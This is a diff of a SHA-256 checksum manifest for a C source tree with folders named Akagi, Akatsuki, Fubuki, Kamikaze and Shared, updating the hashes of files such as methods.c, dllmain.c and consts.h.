a556dd2e3817e397af7c3dc4490de7fa4d4a389f03cbd81284385e239c21c3bf *Source\Akagi\methods\hybrids.c -fcbcf7cd31d90eb1b6b2d04de6ca8bb947260fe8630faa0184ac3fd54314ace4 *Source\Akagi\methods\methods.c -97c81215fd8e5d1e7a69600c3fb0d1575bb96dc0fa0af83fd216d65ff60407a3 *Source\Akagi\methods\methods.h +dbc95934b3dc66c4423c23d98114592aef09f435f7b48393fec5a4b2546b65fa *Source\Akagi\methods\methods.c +1b6604cc2be5cf5438ea00af61df1cc0c42576a6ed386f3fa2b4ceeb791b9cde *Source\Akagi\methods\methods.h bbcd54496dca975abf6089526023446984238d464e2df7485230b76072ff2ea1 *Source\Akagi\methods\rinn.c -90b9ddbe4c4bdcd3c1c6705d50d3428d0953244bcc3daa535fe5158e46540601 *Source\Akagi\methods\routines.h +52bd78ec6ce961e7aafdb77410ef0aee881b23a366a4e94485d4129897cde9b5 *Source\Akagi\methods\routines.h c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63 *Source\Akagi\methods\shellsup.c 87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37 *Source\Akagi\methods\tyranid.c 207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7 *Source\Akagi\methods\wusa.c -51b37b11dde5d4e671e20181dfdc375490943ffe5f411bf9163d9a2b9c048950 *Source\Akagi\methods\zcgonvh.c +a3227bcc66dbd1ed530d3b7858a35d140730742aa86cc88651f7026d6eb14632 *Source\Akagi\methods\zcgonvh.c 4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10 *Source\Akagi\pcasvc\w7\pcasvc7.acf f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8 *Source\Akagi\pcasvc\w7\pcasvc7.idl 0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4 *Source\Akagi\pcasvc\w7\x64\pcasvc7_64.c @@ -73,10 +75,10 @@ df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0 *Source\Akagi\t e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2 *Source\Akatsuki\Akatsuki.vcxproj 4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04 *Source\Akatsuki\Akatsuki.vcxproj.filters 9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Akatsuki\Akatsuki.vcxproj.user -b2f0e7238a85c84b988be6df19dc7466e1c931d8f775dca4ec8b848fb733cb68 *Source\Akatsuki\dllmain.c -ceece33bbd2bc2c7c14fb379e5f33cab50473478e49250669344566ff871122e *Source\Akatsuki\export.def +6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13 *Source\Akatsuki\dllmain.c +bbce2e4fa4cbb392974e7276108f1f9091f31e806a2c81964c996953e0770125 *Source\Akatsuki\export.def 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h -fcb2edfe44c2b8521c245032b5346b0bdc665b656179a3f3a6765c942d371c2a *Source\Akatsuki\version.rc +3e26ccfe04784796001bd9bf56184ffc0c3e8418d2beb3fb8ec3409c67a61479 *Source\Akatsuki\version.rc d299989431a7c94bfe738a9ca8fa3bd0ba8aa6f20173d3004b4949dc7aa6040f *Source\Fubuki\dll.vcxproj 119a274dc329b1d3bc94ee836fc7a18612faa26a517ad04fc3f95cc548f2b1a1 *Source\Fubuki\dll.vcxproj.filters f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7 *Source\Fubuki\dll.vcxproj.user @@ -88,7 +90,7 @@ bbc77818711a5f5152b99ca50cb018575ce05ff59859c45eb4bb7353d86daca8 *Source\Fubuki\ 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h 4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a *Source\Fubuki\uihacks.c 73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9 *Source\Fubuki\uihacks.h -b95bc9182a75a3fa387431278d25ffd03f41903b967c2792a21871b7961da63f *Source\Fubuki\version.rc +f65cdb9d953621b60480e2bb7760ec730cdaf1b370156d99da7e07a45ca27253 *Source\Fubuki\version.rc b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25 *Source\Kamikaze\Kamikaze.msc d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744 *Source\Kamikaze\Launcher.html @@ -99,7 +101,7 @@ e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5 *Source\Naka\ma e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h -598cd7534e3ddd8d1c982d18376b1f80262157d9bd79319965963f754d598fe6 *Source\Shared\consts.h +d523ba3ee7e061c50b066f5ffb5145decdfa8b3a7347b563674f819a714d0f69 *Source\Shared\consts.h 01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h 133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4 *Source\Shared\libinc.h